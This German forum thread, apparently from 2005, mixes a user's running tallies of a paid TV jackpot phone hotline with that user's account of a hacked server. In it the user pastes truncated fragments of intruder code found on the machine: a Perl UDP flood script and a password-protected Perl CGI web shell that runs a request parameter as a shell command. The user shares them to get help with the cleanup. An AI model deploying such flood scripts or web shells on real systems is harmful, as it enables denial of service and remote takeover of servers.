Leg looooos.... es läuft gerade wieder eine Runde und es geht um 106.600 Euro....!!!
Edit:
Achso, Du spielst erst nächste Runde mit? Ist schlau, da gehts dann um 106.700 Euro. Die hundert mehr nimmt man natürlich mt...
Leg looooos.... es läuft gerade wieder eine Runde und es geht um 106.600 Euro....!!!
Edit:
Achso, Du spielst erst nächste Runde mit? Ist schlau, da gehts dann um 106.700 Euro. Die hundert mehr nimmt man natürlich mt...
Naja, mit einer Einschränkung: Mir wurden zuerst alle meine Nummern für die 0137er Rufnummer gesperrt. Dann habe ich dort angerufen und die habens wieder frei geschaltet. Nun läuft das automatisch für jede Nummer einzeln durch die Standardroutine, denn das ist Voreinstellung. Ich habe nur keine Lust jedesmal wieder anzurufen, sondern nehme dann einfach die nächste meiner Rufnummern:-) .
Zwar tut mir der Betrag inzwischen weh, das stimmt schon. Aber wer nicht wagt, der nicht gewinnt, oder?
Edit
Freitag 8:06 Uhr: 105.600 Euro... *hust*
Hi Carolyn!
Sollte der Jackpot von jetzt aktuell 105.100 Euro in meine Tasche wandern, so wird mich die Telefonrechnung nicht berühren. Falls nicht, dann doch, soviel ist sicher. Die Telekom macht es eigentlich schon ganz richtig, dient ja dem Schutz des Kunden vor sich selbst.
Und wieviel ich da bis jetzt telefoniert habe? Hm, geh mal von einem Monatsgehalt eines Abteilungsleiters in einer großen Firma aus...
Sagen wir mal so: mir wirds weh tun, das ist sicher.
Aha. *nixpeil*
Egal, Zwischenstand jetzt 104.600 Euro...
*grins* ...der ist jetzt sicher im Heim, weil die Mutter das auf Vaters Laptop entdeckt hat, diesen erschlug und sich dann der Polente stellte... traurige Familientragödie, demnächst live in "B!LD"...
Und das habe ich auch eben gerade auf meinem Server gefunden:
http://securityresponse.symantec.com/avcenter/venc/…inux.rst.b.html
Nachtrag:
...das ganze mehrfach in unterschiedlichen Verzeichnissen... ganz toll.
Achja und dann noch ein kleines Script. Ich poste mal den Anfang:
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
(...)
Alles anzeigen
DAS waren meine 60 GB Traffic binnen kürzester Zeit. Interessanterweise befindet sich das Script bereits seit 1. Februar auf meinem Server. Da hat jemand lange vorgeplant. Verbindungsdaten über dynamische Einwahl-IPs hat jetzt kein Provider mehr zur Hand, also Rückverfolgung nicht möglich.
So ganz nebenbei fand ich dann noch dies hier:
#!/usr/bin/perl
use CGI qw(:standard);
print header;
$AuthStr=param("booom");
if ($AuthStr eq "carnivores") {
my $k=param("g");
$ll=`$k 2>&1`;
(...)
Habe das auch mal gekürzt... da gehören noch einge andere Dateine dazu, zwei Linux-Dateien und drei php-Scripte.
Bin echt von den Socken, was sich da auf dem Server innerhalb kurzer Zeit abspielte (wenn man mal von dem Script vom 1. Februar absieht).
Jetzt muss ich nur noch herausfinden, was da passiert ist, bzw wie es passieren konnte. Aber ich habe da schon was gefunden, könnte damit zusammen hängen.
Vor einiger Zeit gabs mal einen Angriff, der den Apache kurzfristig überlastete und ich vermute, dass damit eine Lücke entstand, die ausgenutzt werden konnte.
Wer kann mir eventuell sachdienliche Hinweise zu den obigen Scripten geben?
Jo, wird schon werden...ich bleib am Ball.
Allerdings sperrt mir die Telekom so ungefähr alle zwei Tage eine MSN für diese Gewinn-Hotline. Ich habe zwar zehn Rufnummern, aber nur noch 4 funktionierende verfügbar... also so langsam sollte ich mal gewinnen, sonst muss ich mir nen Vorrat an Prepaid-Karten fürs Handy hinlegen
Fehler? *lach*
Ich schotte den ab von hier bis Alaska und zurück. Das braucht seine Zeit, weil ich jede bekannte Möglichkeit austesten will, bevor ich den freigebe. Firewall habe ich komplett neu konfiguriert, iptables ergänzt usw.
Ich checke jetzt gerade sämtliche Scripte auf dem Webspace. Übel viel Arbeit...
Na, da bin ich aber gespannt... *g*
Es geht jetzt um (*edit: 17:39 Uhr am 16.11.) 104.100 Euro oder kurz:
Es geht um die Wurst!
Nachtrag: Edelchen... wo warst Du????
Wenn ich nicht gewinne, dann brauch ich auch keine Ferien mehr....
Stand 16.11.2005, 12:54 Uhr:
103.600 Euro!
Nein, das heisst, dass ich verdammt viel Pech im Glück hatte und da andere ja immer das falsche Wort sagen, es in der nächsten Runde weiter geht. Inzwischen liegt der Jackpott bei schlappen 103.300 Euro....
Wenn's vorbei ist, dann schreibe ich es hier hinein. Egal wer gewinnt....
Ich werde noch bekloppt...
eben gerade bin ich zweimal hintereinander bei einem Jackpot von 103.100 Euro ins Studio duchgekommen. Wahnsinn!
Der zehnte Anrufer gewinnt, aber ich war leider Nr. 4 und danach Nr. 14. Argh...
Hätte es nicht 14 weniger 4 sein können...? *heul*
Moin, Admin.
Der Server läuft inzwischen wieder. Allerdings habe ich ihn komplett für den Zugriff gesperrt und checke erstmal, was passiert ist. So wie es aussieht, hat jemand OpenFTPD darauf installiert.
Sauerei, mein Server ist doch keine Tauschbörse. Muss jetzt sehen, woher das kam. Es sieht alles danach aus, als wenn ich irgendwo auf meinem Server (in meinem eigenen Verantwortungsbereich) ein Script habe, welches so etwas ermöglicht. Scheint mit einfachen Benutzerrechten ans Laufen gebracht worden zu sein. Urheber stammen vermutlich aus Taiwan, so wie ich es im Moment sehe.
Sobald meine Signatur wieder angezeigt wird, ist alles im Lot.
Aber 1&1 wird demnächst einen Kunden verlieren... soviel weiß ich.
Übrigens war die ausgehende sogenannte DoS-Attacke wahrscheinlich keine. Die war nämlich ausschließlich über UDP auf eine IP gerichtet, die es heute irgendwie gar nicht mehr gibt. Keine Einträge in den RIPE-Datenbanken, bei der Denic, kein Reverse-DNS möglich, kein Ping, einfach nichts. Aber definitiv dahin wurden die Datenpakete gesendet.
Jetzt sitze ich gerade an 190MB Protokolldateien und sichte die....
Hab ja sonst nix zu tun. Heute abend hatte ich das erste Mal das Wort Schadensersatz auf meinem AB.
Gruß
webbie
Ja, aber davon gibt es bei meinen 10 Mitspielern nur zwei und eins ist 'ne Frau Alle anderen kenne ich ja nicht, die haben sich nur wegen ebay gemeldet und sind mir soweit unbekannt.
Für heute ist Schluß, der Tipp für morgen ist schon wieder sowas von eindeutig, da fasse ich mir echt an den Kopf. Es ist unglaublich, dass es nicht aufgelöst wird.
Edit 16.11.2005, 7:52 Uhr
Der Jackpot liegt inzwischen bei 103.100 Euro.
Eine Meldung, die mir im Forum Deutsches Recht (siehe hier im Forum Linktipps) zugänglich gemacht wurde.
ZitatAlles anzeigenZitat:
Nach einem Urteil des Amtsgerichts Gelnhausen vom 6. Oktober 2005 haftet der Inhaber eines Servers gegenüber dem Hosting-Provider für Traffic-Kosten, die durch einen DDos-Angriff eines Dritten entstehen (Az. 51 C 202/05).Die Klägerin des Verfahrens hatte an den Beklagten Webserver vermietet und eine Gesamt-Traffic-Menge von 250 GByte vereinbart. Der Beklagte trat damit als Reseller auf und vermittelte Webhosting-Dienstleistungen an eigene Kunden. Ende Juli 2004 kam es zu DDoS-Attacken auf Server des Beklagten, woraufhin die Klägerin das gesamte Rechnersystem des Beklagten vom Netz nahm, sodass dieser seinen Kunden gegenüber keine Dienste mehr erbringen konnte. Nachdem der Beklagte die Klägerin wiederholt erfolglos zur Wiederanbindung seiner Server aufgefordert hatte, erklärte er Mitte August 2004 die außerordentliche Kündigung des Vertrags mit der Klägerin.
Dessen ungeachtet verklagte die Klägerin den Beklagten auf Zahlung von 1.232,42 Euro. Hierin enthalten waren neben den Mietkosten für die Server in den Monaten August bis Oktober auch Kosten für 57 GByte zusätzlichen Datenverkehrs in Höhe von rund 27,93 Euro sowie 92,50 Euro für "Dienstleistungen wegen der DDoS-Attacken".
Nach dem Urteil des Amtsgerichts hat der Beklagte im vorliegenden Fall die Kosten für den zusätzlichen Datenverkehr sowie für die Dienstleistungen im Zusammenhang mit dem Angriff zu übernehmen. Dieser erfolgte auf den Server des Beklagten und läge damit nach Ansicht des Gerichts grundsätzlich in seinem Risikobereich. Der erhöhte Datentransfer und die Leistungen zur Analyse und dem Stoppen der Attacken seien daher nicht der Klägerin anzulasten, sondern erfolgten im Vertragsverhältnis zwischen den Parteien zu Gunsten des Beklagten. Wegen dieser Kosten könne der Beklagte Rückgriff nur bei den Verursachern der Angriffe nehmen, nicht aber die Leistung gegenüber der Klägerin verweigern.
Im Übrigen sei die außerordentliche Kündigung durch den Beklagten aber rechtmäßig. Die Klägerin habe unstreitig das komplette Rechnersystem des Beklagten ohne Vorankündigung vom Netz genommen mit der Folge, dass der Beklagte gegenüber seinen Kunden keine Leistungen mehr erbringen konnte. Dazu sei die Klägerin nicht berechtigt gewesen. Dies ergebe sich auch nicht aus den AGB, da diese ein Fehlverhalten des Beklagten voraussetzten, das im vorliegenden Fall nicht nachgewiesen werden könnte. Demnach habe die Klägerin auch keinen Anspruch auf Mietkosten für die Zeit nach der Kündigung.
Das Urteil stellt eine der ersten Entscheidungen zu dem unter Juristen strittigem Thema der Haftung bei Server-Angriffen dar.
Hier der Link zum vollständigen Text des Urteiles:
http://www.dr-bahr.com/download/ag-ge…51-C-202-05.pdf
Ja, da sollte man drüber nachdenken... aber vermutlich ist das Spiel genau dann vorbei, wenn ich meine Werbung auf den Sender bringen will.... Ist doch immer so.
Stand: 101.500 Euro
Der Jackpot beträgt wahnsinnige 101.400 Euro....
Wenn ich dann noch 101.399 andere finden, dann kann ich mir das anrufen auch schenken...
Telefonflat? Für eine 0137er-Nummer? Schön wärs. Nee, das würde mich ja massiv entlasten, aber dem ist nicht so. Der Anruf kostet für jeden aus dem Festnetz die gleiche Kohle, nur mit Handy wirds teuerer...
wobei ich gehört habe, dass viele schon gar nicht mehr anrufen können, weil die Telekom die Nummer an etlichen Anschlüssen in Schleswig-Holstein gesperrt hat.